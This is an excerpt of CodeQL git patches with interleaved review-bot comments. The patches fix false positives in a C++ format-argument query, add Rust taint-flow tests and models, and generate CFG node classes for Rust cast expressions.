@@ -3,9 +3,10 @@ int printf(const char * format, ...); int fprintf(); -void f() { +void f(UNKNOWN_CHAR * str) { printf("%s", 1); // BAD printf("%s", implicit_function()); // GOOD - we should ignore the type sprintf(0, "%s", ""); // GOOD fprintf(0, "%s", ""); // GOOD + printf("%s", str); // GOOD - erroneous type is ignored } From 28c5187a3c6505593635b3262e69ca486d87a8d5 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Wed, 4 Dec 2024 11:02:19 +0000 Subject: [PATCH 0790/1267] C++: Remove FPs in cpp/wrong-type-format-argument when string type is an error --- cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql | 4 ++++ .../Buildless/WrongTypeFormatArguments.expected | 1 - 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql index 027f4caa8ae..905c4307ad1 100644 --- a/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql +++ b/cpp/ql/src/Likely Bugs/Format/WrongTypeFormatArguments.ql @@ -171,6 +171,10 @@ where not arg.isAffectedByMacro() and not arg.isFromUninstantiatedTemplate(_) and not actual.getUnspecifiedType() instanceof ErroneousType and + not ( + expected instanceof PointerType and + actual.getUnspecifiedType().(PointerType).getBaseType() instanceof ErroneousType + ) and not arg.(Call).mayBeFromImplicitlyDeclaredFunction() select arg, "This format specifier for type '" + expected.getName() + "' does not match the argument type '" + diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected index 8ff4f02d4d6..745f2f790f7 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected 
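Review bot: The added `printf("%s", str)` case in `f` pins only the path that the follow-up commit suppresses. Nothing checks that a pointer to the unresolved `UNKNOWN_CHAR` type is still reported when the specifier is not a pointer type. Adding `printf("%d", str); // BAD` after the new line would guard against the exclusion growing too broad, since a silently dropped mismatch in this query is a missed memory-safety finding. Whether the buildless extractor reports that line today should be confirmed by running the test.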
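Review bot: The added `not (...)` conjunct in the `where` clause has no comment, and it is broader than the commit title suggests: it applies whenever `expected` is any `PointerType`, not only the `char *` of a string specifier. A comment such as `// The pointee type failed to resolve, so a pointer-typed specifier cannot be checked against it.` would record the intent. The conjunct also matches a single pointer level only, so an argument typed like `UNKNOWN **` would presumably still be reported; that may be intended but is worth stating. The `where` clause begins outside the hunk.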
+++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected @@ -1,2 +1 @@ | tests.c:7:18:7:18 | 1 | This format specifier for type 'char *' does not match the argument type 'int'. | -| tests.c:11:18:11:20 | str | This format specifier for type 'char *' does not match the argument type ' *'. | From f10ffa39e46403f6d401c4a0dc41e244116c0559 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Wed, 4 Dec 2024 12:54:36 +0100 Subject: [PATCH 0791/1267] Rust: Add tests for taint flow --- .../library-tests/dataflow/models/main.rs | 10 ++ .../dataflow/models/models.expected | 138 ++++++++++++------ .../library-tests/dataflow/models/models.ql | 12 +- .../dataflow/taint/inline-taint-flow.expected | 6 + .../dataflow/taint/inline-taint-flow.ql | 12 ++ .../test/library-tests/dataflow/taint/main.rs | 31 ++++ 6 files changed, 164 insertions(+), 45 deletions(-) create mode 100644 rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected create mode 100644 rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql create mode 100644 rust/ql/test/library-tests/dataflow/taint/main.rs diff --git a/rust/ql/test/library-tests/dataflow/models/main.rs b/rust/ql/test/library-tests/dataflow/models/main.rs index 21cfc10ad2f..899736aec65 100644 --- a/rust/ql/test/library-tests/dataflow/models/main.rs +++ b/rust/ql/test/library-tests/dataflow/models/main.rs @@ -16,6 +16,16 @@ fn test_identify() { sink(identity(s)); // $ hasValueFlow=1 } +// has a flow model +fn coerce(_i: i64) -> i64 { + 0 +} + +fn test_coerce() { + let s = source(14); + sink(coerce(s)); // $ MISSING: hasTaintFlow=14 +} + enum MyPosEnum { A(i64), B(i64), diff --git a/rust/ql/test/library-tests/dataflow/models/models.expected b/rust/ql/test/library-tests/dataflow/models/models.expected index eeb9301b434..3aea90c7fb3 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.expected +++ b/rust/ql/test/library-tests/dataflow/models/models.expected 
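Review bot: The comment `// has a flow model` on `coerce` does not say that the model is taint-only, which is why `test_coerce` expects `hasTaintFlow=14` rather than `hasValueFlow`. The matching `SummarizedCallableCoerce` in models.ql sets `preservesValue = false`, so I would write `// has a taint-only flow model (preservesValue = false in models.ql)`. That makes the `MISSING:` marker on the sink readable as a known gap in taint propagation and not as a mistake in the annotation.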
@@ -1,57 +1,107 @@ models edges | main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | +| main.rs:15:13:15:21 | source(...) | main.rs:16:19:16:19 | s | provenance | | | main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | -| main.rs:30:13:30:21 | source(...) | main.rs:31:27:31:27 | s | provenance | | -| main.rs:31:14:31:28 | ...::A(...) [A] | main.rs:32:22:32:23 | e1 [A] | provenance | | -| main.rs:31:27:31:27 | s | main.rs:31:14:31:28 | ...::A(...) [A] | provenance | | -| main.rs:32:22:32:23 | e1 [A] | main.rs:32:10:32:24 | get_var_pos(...) | provenance | | -| main.rs:43:13:43:21 | source(...) | main.rs:44:26:44:26 | s | provenance | | -| main.rs:44:14:44:27 | set_var_pos(...) [B] | main.rs:47:9:47:23 | ...::B(...) [B] | provenance | | -| main.rs:44:26:44:26 | s | main.rs:44:14:44:27 | set_var_pos(...) [B] | provenance | | -| main.rs:47:9:47:23 | ...::B(...) [B] | main.rs:47:22:47:22 | i | provenance | | -| main.rs:47:22:47:22 | i | main.rs:47:33:47:33 | i | provenance | | -| main.rs:62:13:62:21 | source(...) | main.rs:63:40:63:40 | s | provenance | | -| main.rs:63:14:63:42 | ...::C {...} [C] | main.rs:64:24:64:25 | e1 [C] | provenance | | -| main.rs:63:40:63:40 | s | main.rs:63:14:63:42 | ...::C {...} [C] | provenance | | -| main.rs:64:24:64:25 | e1 [C] | main.rs:64:10:64:26 | get_var_field(...) | provenance | | -| main.rs:75:13:75:21 | source(...) | main.rs:76:28:76:28 | s | provenance | | -| main.rs:76:14:76:29 | set_var_field(...) [D] | main.rs:79:9:79:37 | ...::D {...} [D] | provenance | | -| main.rs:76:28:76:28 | s | main.rs:76:14:76:29 | set_var_field(...) [D] | provenance | | -| main.rs:79:9:79:37 | ...::D {...} [D] | main.rs:79:35:79:35 | i | provenance | | -| main.rs:79:35:79:35 | i | main.rs:79:47:79:47 | i | provenance | | +| main.rs:16:19:16:19 | s | main.rs:16:10:16:20 | identity(...) | provenance | | +| main.rs:40:13:40:21 | source(...) 
| main.rs:41:27:41:27 | s | provenance | | +| main.rs:40:13:40:21 | source(...) | main.rs:41:27:41:27 | s | provenance | | +| main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | +| main.rs:41:14:41:28 | ...::A(...) [A] | main.rs:42:22:42:23 | e1 [A] | provenance | | +| main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | +| main.rs:41:27:41:27 | s | main.rs:41:14:41:28 | ...::A(...) [A] | provenance | | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | +| main.rs:42:22:42:23 | e1 [A] | main.rs:42:10:42:24 | get_var_pos(...) | provenance | | +| main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | +| main.rs:53:13:53:21 | source(...) | main.rs:54:26:54:26 | s | provenance | | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | main.rs:57:9:57:23 | ...::B(...) [B] | provenance | | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | +| main.rs:54:26:54:26 | s | main.rs:54:14:54:27 | set_var_pos(...) [B] | provenance | | +| main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | +| main.rs:57:9:57:23 | ...::B(...) [B] | main.rs:57:22:57:22 | i | provenance | | +| main.rs:57:22:57:22 | i | main.rs:57:33:57:33 | i | provenance | | +| main.rs:57:22:57:22 | i | main.rs:57:33:57:33 | i | provenance | | +| main.rs:72:13:72:21 | source(...) | main.rs:73:40:73:40 | s | provenance | | +| main.rs:72:13:72:21 | source(...) 
| main.rs:73:40:73:40 | s | provenance | | +| main.rs:73:14:73:42 | ...::C {...} [C] | main.rs:74:24:74:25 | e1 [C] | provenance | | +| main.rs:73:14:73:42 | ...::C {...} [C] | main.rs:74:24:74:25 | e1 [C] | provenance | | +| main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | +| main.rs:73:40:73:40 | s | main.rs:73:14:73:42 | ...::C {...} [C] | provenance | | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | +| main.rs:74:24:74:25 | e1 [C] | main.rs:74:10:74:26 | get_var_field(...) | provenance | | +| main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | +| main.rs:85:13:85:21 | source(...) | main.rs:86:28:86:28 | s | provenance | | +| main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | +| main.rs:86:14:86:29 | set_var_field(...) [D] | main.rs:89:9:89:37 | ...::D {...} [D] | provenance | | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | +| main.rs:86:28:86:28 | s | main.rs:86:14:86:29 | set_var_field(...) [D] | provenance | | +| main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | +| main.rs:89:9:89:37 | ...::D {...} [D] | main.rs:89:35:89:35 | i | provenance | | +| main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | +| main.rs:89:35:89:35 | i | main.rs:89:47:89:47 | i | provenance | | nodes | main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | +| main.rs:15:13:15:21 | source(...) | semmle.label | source(...) | +| main.rs:16:10:16:20 | identity(...) | semmle.label | identity(...) | | main.rs:16:10:16:20 | identity(...) | semmle.label | identity(...) | | main.rs:16:19:16:19 | s | semmle.label | s | -| main.rs:30:13:30:21 | source(...) | semmle.label | source(...) | -| main.rs:31:14:31:28 | ...::A(...) [A] | semmle.label | ...::A(...) 
[A] | -| main.rs:31:27:31:27 | s | semmle.label | s | -| main.rs:32:10:32:24 | get_var_pos(...) | semmle.label | get_var_pos(...) | -| main.rs:32:22:32:23 | e1 [A] | semmle.label | e1 [A] | -| main.rs:43:13:43:21 | source(...) | semmle.label | source(...) | -| main.rs:44:14:44:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | -| main.rs:44:26:44:26 | s | semmle.label | s | -| main.rs:47:9:47:23 | ...::B(...) [B] | semmle.label | ...::B(...) [B] | -| main.rs:47:22:47:22 | i | semmle.label | i | -| main.rs:47:33:47:33 | i | semmle.label | i | -| main.rs:62:13:62:21 | source(...) | semmle.label | source(...) | -| main.rs:63:14:63:42 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | -| main.rs:63:40:63:40 | s | semmle.label | s | -| main.rs:64:10:64:26 | get_var_field(...) | semmle.label | get_var_field(...) | -| main.rs:64:24:64:25 | e1 [C] | semmle.label | e1 [C] | -| main.rs:75:13:75:21 | source(...) | semmle.label | source(...) | -| main.rs:76:14:76:29 | set_var_field(...) [D] | semmle.label | set_var_field(...) [D] | -| main.rs:76:28:76:28 | s | semmle.label | s | -| main.rs:79:9:79:37 | ...::D {...} [D] | semmle.label | ...::D {...} [D] | -| main.rs:79:35:79:35 | i | semmle.label | i | -| main.rs:79:47:79:47 | i | semmle.label | i | +| main.rs:16:19:16:19 | s | semmle.label | s | +| main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | +| main.rs:40:13:40:21 | source(...) | semmle.label | source(...) | +| main.rs:41:14:41:28 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:41:14:41:28 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | +| main.rs:41:27:41:27 | s | semmle.label | s | +| main.rs:41:27:41:27 | s | semmle.label | s | +| main.rs:42:10:42:24 | get_var_pos(...) | semmle.label | get_var_pos(...) | +| main.rs:42:10:42:24 | get_var_pos(...) | semmle.label | get_var_pos(...) 
| +| main.rs:42:22:42:23 | e1 [A] | semmle.label | e1 [A] | +| main.rs:42:22:42:23 | e1 [A] | semmle.label | e1 [A] | +| main.rs:53:13:53:21 | source(...) | semmle.label | source(...) | +| main.rs:53:13:53:21 | source(...) | semmle.label | source(...) | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | +| main.rs:54:14:54:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | +| main.rs:54:26:54:26 | s | semmle.label | s | +| main.rs:54:26:54:26 | s | semmle.label | s | +| main.rs:57:9:57:23 | ...::B(...) [B] | semmle.label | ...::B(...) [B] | +| main.rs:57:9:57:23 | ...::B(...) [B] | semmle.label | ...::B(...) [B] | +| main.rs:57:22:57:22 | i | semmle.label | i | +| main.rs:57:22:57:22 | i | semmle.label | i | +| main.rs:57:33:57:33 | i | semmle.label | i | +| main.rs:57:33:57:33 | i | semmle.label | i | +| main.rs:72:13:72:21 | source(...) | semmle.label | source(...) | +| main.rs:72:13:72:21 | source(...) | semmle.label | source(...) | +| main.rs:73:14:73:42 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | +| main.rs:73:14:73:42 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | +| main.rs:73:40:73:40 | s | semmle.label | s | +| main.rs:73:40:73:40 | s | semmle.label | s | +| main.rs:74:10:74:26 | get_var_field(...) | semmle.label | get_var_field(...) | +| main.rs:74:10:74:26 | get_var_field(...) | semmle.label | get_var_field(...) | +| main.rs:74:24:74:25 | e1 [C] | semmle.label | e1 [C] | +| main.rs:74:24:74:25 | e1 [C] | semmle.label | e1 [C] | +| main.rs:85:13:85:21 | source(...) | semmle.label | source(...) | +| main.rs:85:13:85:21 | source(...) | semmle.label | source(...) | +| main.rs:86:14:86:29 | set_var_field(...) [D] | semmle.label | set_var_field(...) [D] | +| main.rs:86:14:86:29 | set_var_field(...) [D] | semmle.label | set_var_field(...) 
[D] | +| main.rs:86:28:86:28 | s | semmle.label | s | +| main.rs:86:28:86:28 | s | semmle.label | s | +| main.rs:89:9:89:37 | ...::D {...} [D] | semmle.label | ...::D {...} [D] | +| main.rs:89:9:89:37 | ...::D {...} [D] | semmle.label | ...::D {...} [D] | +| main.rs:89:35:89:35 | i | semmle.label | i | +| main.rs:89:35:89:35 | i | semmle.label | i | +| main.rs:89:47:89:47 | i | semmle.label | i | +| main.rs:89:47:89:47 | i | semmle.label | i | subpaths testFailures invalidSpecComponent #select | main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | -| main.rs:32:10:32:24 | get_var_pos(...) | main.rs:30:13:30:21 | source(...) | main.rs:32:10:32:24 | get_var_pos(...) | $@ | main.rs:30:13:30:21 | source(...) | source(...) | -| main.rs:47:33:47:33 | i | main.rs:43:13:43:21 | source(...) | main.rs:47:33:47:33 | i | $@ | main.rs:43:13:43:21 | source(...) | source(...) | -| main.rs:64:10:64:26 | get_var_field(...) | main.rs:62:13:62:21 | source(...) | main.rs:64:10:64:26 | get_var_field(...) | $@ | main.rs:62:13:62:21 | source(...) | source(...) | -| main.rs:79:47:79:47 | i | main.rs:75:13:75:21 | source(...) | main.rs:79:47:79:47 | i | $@ | main.rs:75:13:75:21 | source(...) | source(...) | +| main.rs:16:10:16:20 | identity(...) | main.rs:15:13:15:21 | source(...) | main.rs:16:10:16:20 | identity(...) | $@ | main.rs:15:13:15:21 | source(...) | source(...) | +| main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 | source(...) | source(...) | +| main.rs:42:10:42:24 | get_var_pos(...) | main.rs:40:13:40:21 | source(...) | main.rs:42:10:42:24 | get_var_pos(...) | $@ | main.rs:40:13:40:21 | source(...) | source(...) | +| main.rs:57:33:57:33 | i | main.rs:53:13:53:21 | source(...) | main.rs:57:33:57:33 | i | $@ | main.rs:53:13:53:21 | source(...) | source(...) 
| +| main.rs:57:33:57:33 | i | main.rs:53:13:53:21 | source(...) | main.rs:57:33:57:33 | i | $@ | main.rs:53:13:53:21 | source(...) | source(...) | +| main.rs:74:10:74:26 | get_var_field(...) | main.rs:72:13:72:21 | source(...) | main.rs:74:10:74:26 | get_var_field(...) | $@ | main.rs:72:13:72:21 | source(...) | source(...) | +| main.rs:74:10:74:26 | get_var_field(...) | main.rs:72:13:72:21 | source(...) | main.rs:74:10:74:26 | get_var_field(...) | $@ | main.rs:72:13:72:21 | source(...) | source(...) | +| main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | +| main.rs:89:47:89:47 | i | main.rs:85:13:85:21 | source(...) | main.rs:89:47:89:47 | i | $@ | main.rs:85:13:85:21 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/models/models.ql b/rust/ql/test/library-tests/dataflow/models/models.ql index 080d6b58f5c..53c3f5de4be 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.ql +++ b/rust/ql/test/library-tests/dataflow/models/models.ql @@ -25,6 +25,16 @@ private class SummarizedCallableIdentity extends SummarizedCallable::Range { } } +private class SummarizedCallableCoerce extends SummarizedCallable::Range { + SummarizedCallableCoerce() { this = "repo::test::_::crate::coerce" } + + override predicate propagatesFlow(string input, string output, boolean preservesValue) { + input = "Argument[0]" and + output = "ReturnValue" and + preservesValue = false + } +} + private class SummarizedCallableGetVarPos extends SummarizedCallable::Range { SummarizedCallableGetVarPos() { this = "repo::test::_::crate::get_var_pos" } @@ -71,7 +81,7 @@ module CustomConfig implements DataFlow::ConfigSig { predicate isSink(DataFlow::Node sink) { DefaultFlowConfig::isSink(sink) } } -import ValueFlowTest +import FlowTest from PathNode source, PathNode sink where flowPath(source, sink) 
diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected new file mode 100644 index 00000000000..4e4a41dfc62 --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.expected @@ -0,0 +1,6 @@ +models +edges +nodes +subpaths +testFailures +#select diff --git a/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql new file mode 100644 index 00000000000..2929ae90964 --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/inline-taint-flow.ql @@ -0,0 +1,12 @@ +/** + * @kind path-problem + */ + +import rust +import utils.InlineFlowTest +import DefaultFlowTest +import TaintFlow::PathGraph + +from TaintFlow::PathNode source, TaintFlow::PathNode sink +where TaintFlow::flowPath(source, sink) +select sink, source, sink, "$@", source, source.toString() diff --git a/rust/ql/test/library-tests/dataflow/taint/main.rs b/rust/ql/test/library-tests/dataflow/taint/main.rs new file mode 100644 index 00000000000..d3b19f3bc52 --- /dev/null +++ b/rust/ql/test/library-tests/dataflow/taint/main.rs @@ -0,0 +1,31 @@ +// Tests for taint flow. + +fn source(i: i64) -> i64 { + 1000 + i +} + +fn sink(s: i64) { + println!("{}", s); +} + +fn addition() { + let a = source(42); + sink(a + 1); // $ MISSING: hasTaintFlow=42 +} + +fn negation() { + let a = source(17); + sink(-a); // $ MISSING: hasTaintFlow=17 +} + +fn cast() { + let a = source(77); + let b = a as u8; + sink(b as i64); // $ MISSING: hasTaintFlow=77 +} + +fn main() { + addition(); + negation(); + cast(); +} From 2ada999728d54c821be0a4eab9a66ba3647d1cc8 Mon Sep 17 00:00:00 2001 
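Review bot: Every sink in the new taint/main.rs is annotated `MISSING: hasTaintFlow` and no sink is required to stay untainted, so with the empty `.expected` file the test cannot catch over-tainting once the taint steps are implemented. I would add a negative case such as `fn no_flow() { let _a = source(5); sink(0); }` and call it from `main`. In `cast`, the value passes through `as u8`, which truncates `1000 + 77`; a short comment such as `// taint is expected to survive the lossy cast` would make that expectation explicit.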
From: Simon Friis Vindum Date: Wed, 4 Dec 2024 12:56:54 +0100 Subject: [PATCH 0792/1267] Rust: Include `as` expression in CFG nodes --- rust/ql/.generated.list | 8 +-- .../internal/generated/CfgNodes.qll | 72 +++++++++++++++++++ rust/ql/lib/codeql/rust/elements/CastExpr.qll | 2 +- .../rust/elements/internal/CastExprImpl.qll | 2 +- .../elements/internal/generated/CastExpr.qll | 2 +- .../rust/elements/internal/generated/Raw.qll | 2 +- .../generated/.generated_tests.list | 2 +- .../generated/CastExpr/gen_cast_expr.rs | 2 +- rust/schema/annotations.py | 4 +- 9 files changed, 84 insertions(+), 12 deletions(-) diff --git a/rust/ql/.generated.list b/rust/ql/.generated.list index bd477792923..a553dcd1e26 100644 --- a/rust/ql/.generated.list +++ b/rust/ql/.generated.list @@ -1,4 +1,4 @@ -lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll b0e9c10a3fdd62e355dcc74f9d5198e6f4d597cd957efd4dd7a3418115055c5c 14fc7e1beb4751897639c5c3a64d5eb234ff0dc753d2db0b8d4c1845a55959f0 +lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll 63fcdcbe20f3c44ab5c53c5aeb109b179026a743dafb369790eb151b1cb7d3d1 9f43a3279a815153cd529638245e0a2022c6df0a7510f08198eb397bea30c049 lib/codeql/rust/elements/Abi.qll 4c973d28b6d628f5959d1f1cc793704572fd0acaae9a97dfce82ff9d73f73476 250f68350180af080f904cd34cb2af481c5c688dc93edf7365fd0ae99855e893 lib/codeql/rust/elements/Addressable.qll 13011bfd2e1556694c3d440cc34af8527da4df49ad92b62f2939d3699ff2cea5 ddb25935f7553a1a384b1abe2e4b4fa90ab50b952dadec32fd867afcb054f4be lib/codeql/rust/elements/ArgList.qll 661f5100f5d3ef8351452d9058b663a2a5c720eea8cf11bedd628969741486a2 28e424aac01a90fb58cd6f9f83c7e4cf379eea39e636bc0ba07efc818be71c71 
@@ -21,7 +21,7 @@ lib/codeql/rust/elements/BreakExpr.qll 7ca3807a20e9a9a988d1fd7abebf240325ed422fc lib/codeql/rust/elements/CallExpr.qll f336500ca7a611b164d48b90e80edb0c0d3816792b0ececce659ac1ff1ffeb3e f99a9c55466418ef53860c44d9f2d6161af4b492178ddd9e5870dff742b70ae5 lib/codeql/rust/elements/CallExprBase.qll 2846202b5208b541977500286951d96487bf555838c6c16cdd006a71e383745a c789d412bf099c624329379e0c7d94fa0d23ae2edea7a25a2ea0f3c0042ccf62 lib/codeql/rust/elements/Callable.qll e1ed21a7e6bd2426f6ccd0e46cee506d8ebf90a6fdc4dca0979157da439853aa 02f6c09710116ce82157aec9a5ec706983c38e4d85cc631327baf8d409b018c6 -lib/codeql/rust/elements/CastExpr.qll cd8333612f94b47b19ea45cd0f78d62855b30e1a86d7f3052a7bec503bc8f575 198089248d838155081586f81403320ca88375bf178f8d831b0860693bb85386 +lib/codeql/rust/elements/CastExpr.qll 2fe1f36ba31fa29de309baf0a665cfcae67b61c73345e8f9bbd41e8c235fec45 c5b4c1e9dc24eb2357799defcb2df25989075e3a80e8663b74204a1c1b70e29a lib/codeql/rust/elements/ClosureBinder.qll 977df800f97cc9b03fffb5e5e1fc6acd08a2938e04cb6ad91108784a15b0d510 f6fad4127226fe1dff2f16416d8a7fde5d8ab4a88f30e443ac5e5ff618de3e05 lib/codeql/rust/elements/ClosureExpr.qll 67e2a106e9154c90367b129987e574d2a9ecf5b297536627e43706675d35eaed d6a381132ddd589c5a7ce174f50f9620041ddf690e15a65ebfb05ff7e7c02de7 lib/codeql/rust/elements/Comment.qll fedad50575125e9a64a8a8776a8c1dbf1e76df990f01849d9f0955f9d74cb2a6 8eb1afad1e1007a4f0090fdac65d81726b23eda6517d067fd0185f70f17635ab 
@@ -437,7 +437,7 @@ lib/codeql/rust/elements/internal/generated/BreakExpr.qll 0f428a8b2f4209b134c2ff lib/codeql/rust/elements/internal/generated/CallExpr.qll f1b8dae487077cc9d1dccf8c3cd61fd17afe860585f17ce8b860be4859be7ca4 6034fc03778e38802cdf3a6e460364b74e92912622581b31e6179951022bbbd6 lib/codeql/rust/elements/internal/generated/CallExprBase.qll cce796e36847249f416629bacf3ea146313084de3374587412e66c10d2917b83 c219aa2174321c161a4a742ca0605521687ca9a5ca32db453a5c62db6f7784cc lib/codeql/rust/elements/internal/generated/Callable.qll b0502b5263b7bcd18e740f284f992c0e600e37d68556e3e0ba54a2ac42b94934 bda3e1eea11cacf5a9b932cd72efc2de6105103e8c575880fcd0cd89daadf068 -lib/codeql/rust/elements/internal/generated/CastExpr.qll 427bfd937cd3e737c65aa121aab2a7dc166f82aaacb9a7c41a3d211d4c1dcfb0 642c8c27d4a8752744dadce45814d4e289ce02b67eb2bc2e63ff4c2e5f7825f5 +lib/codeql/rust/elements/internal/generated/CastExpr.qll ddc20054b0b339ad4d40298f3461490d25d00af87c876da5ffbc6a11c0832295 f4247307afcd74d80e926f29f8c57e78c50800984483e6b6003a44681e4a71f3 lib/codeql/rust/elements/internal/generated/ClosureBinder.qll 94c0dcdd4cd87d115659d496c88a98354bc7d4ddc0fa27028003bf7688b99987 d59d713b426dbbdb775df9092d176eea031dac1f14e468810f2fc8591399cd19 lib/codeql/rust/elements/internal/generated/ClosureExpr.qll 34149bf82f107591e65738221e1407ec1dc9cc0dfb10ae7f761116fda45162de fd2fbc9a87fc0773c940db64013cf784d5e4137515cc1020e2076da329f5a952 lib/codeql/rust/elements/internal/generated/Comment.qll cd1ef861e3803618f9f78a4ac00516d50ecfecdca1c1d14304dc5327cbe07a3b 8b67345aeb15beb5895212228761ea3496297846c93fd2127b417406ae87c201 
@@ -531,7 +531,7 @@ lib/codeql/rust/elements/internal/generated/PtrTypeRepr.qll 51d1e9e683fc79dddbff lib/codeql/rust/elements/internal/generated/PureSynthConstructors.qll e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f e5b8e69519012bbaae29dcb82d53f7f7ecce368c0358ec27ef6180b228a0057f lib/codeql/rust/elements/internal/generated/RangeExpr.qll 23cca03bf43535f33b22a38894f70d669787be4e4f5b8fe5c8f7b964d30e9027 18624cef6c6b679eeace2a98737e472432e0ead354cca02192b4d45330f047c9 lib/codeql/rust/elements/internal/generated/RangePat.qll 80826a6a6868a803aa2372e31c52a03e1811a3f1f2abdb469f91ca0bfdd9ecb6 34ee1e208c1690cba505dff2c588837c0cd91e185e2a87d1fe673191962276a9 -lib/codeql/rust/elements/internal/generated/Raw.qll f52ff91f985848ca0e251efee1e246ae80fdca13f530df301f7090a5b18bcf13 136a84549b183d222fb6063d34d4b714b7dd42f6eb3f756894285bf405c24a22 +lib/codeql/rust/elements/internal/generated/Raw.qll 7ffb00a545dfe16556b60a92f118c1175544f07ece90b7f46db2c119a2481753 e6fd9bb3da185bcfbb55f477f0ef31f689df7d66b76bcf93e29e020a67f07f42 lib/codeql/rust/elements/internal/generated/RecordExpr.qll eb6cb662e463f9260efae1a6ce874fa781172063b916ef1963f861e9942d308d 1a21cbccc8f3799ff13281e822818ebfb21d81591720a427cac3625512cb9d40 lib/codeql/rust/elements/internal/generated/RecordExprField.qll 7e9f8663d3b74ebbc9603b10c9912f082febba6bd73d344b100bbd3edf837802 fbe6b578e7fd5d5a6f21bbb8c388957ab7210a6a249ec71510a50fb35b319ea1 lib/codeql/rust/elements/internal/generated/RecordExprFieldList.qll 179a97211fe7aa6265085d4d54115cdbc0e1cd7c9b2135591e8f36d6432f13d3 dd44bbbc1e83a1ed3a587afb729d7debf7aeb7b63245de181726af13090e50c0 diff --git a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll index b28dd64d66e..fcdc33679cd 100644 --- a/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll +++ b/rust/ql/lib/codeql/rust/controlflow/internal/generated/CfgNodes.qll 
@@ -703,6 +703,66 @@ module MakeCfgNodes Input> { int getNumberOfAttrs() { result = count(int i | exists(this.getAttr(i))) } } + final private class ParentCastExpr extends ParentAstNode, CastExpr { + override predicate relevantChild(AstNode child) { + none() + or + child = this.getExpr() + } + } + + /** + * A type cast expression. For example: + * ```rust + * value as u64; + * ``` + */ + final class CastExprCfgNode extends CfgNodeFinal, ExprCfgNode { + private CastExpr node; + + CastExprCfgNode() { node = this.getAstNode() } + + /** Gets the underlying `CastExpr`. */ + CastExpr getCastExpr() { result = node } + + /** + * Gets the `index`th attr of this cast expression (0-based). + */ + Attr getAttr(int index) { result = node.getAttr(index) } + + /** + * Gets any of the attrs of this cast expression. + */ + Attr getAnAttr() { result = this.getAttr(_) } + + /** + * Gets the number of attrs of this cast expression. + */ + int getNumberOfAttrs() { result 